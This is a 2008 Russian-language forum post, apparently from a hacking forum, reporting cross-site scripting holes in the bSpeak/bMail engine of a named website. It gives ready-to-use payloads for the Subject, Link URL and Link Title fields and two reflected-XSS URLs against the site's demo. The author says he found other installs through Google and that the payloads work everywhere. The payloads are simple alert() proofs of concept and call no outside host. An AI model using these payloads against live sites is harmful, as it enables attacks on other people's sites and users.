13.03.2008, 13:52
|
|
Познающий
Регистрация: 22.11.2006
Сообщений: 68
Провел на форуме:
682079
Репутация:
137
|
|
Сообщение от ЛифчиС5СВ
www.26thavenue.com
Поковырял еще немного.
Кроме этого в bMail (типа личные сообщения) уязвимо для простейшей XSS поле Subject.
Так же просто вставляем
Код:
<script>alert(/Xss/)</script>
Потом еще при отправке сообщений - поля
Link URL,
Link Title.
Код:
"><script>alert()</script>
Забил в гугл
попробовал в нескольких местах, везде работает.
Кроме этого есть пассивные XSS в этом движке, пример -
Код:
http://www.26thavenue.com/bspeakdemo/index.php?action=login&msg=%3Cscript%3Ealert()%3C/script%3E
или в другом месте -
Код:
http://www.26thavenue.com/bspeakdemo/index.php?action=retrieve&msg=%3Cscript%3Ealert()%3C/script%3E
Последний раз редактировалось Horsekiller; 13.03.2008 в 14:05..
|
|
|